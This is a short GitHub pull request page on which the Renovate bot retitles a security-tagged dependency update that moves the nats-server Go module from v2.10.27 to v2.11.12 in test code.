@renovate renovate bot changed the title test: update module github.com/nats-io/nats-server/v2 to v2.10.27 [security] test: update module github.com/nats-io/nats-server/v2 to v2.11.12 [security] Feb 24, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

0 participants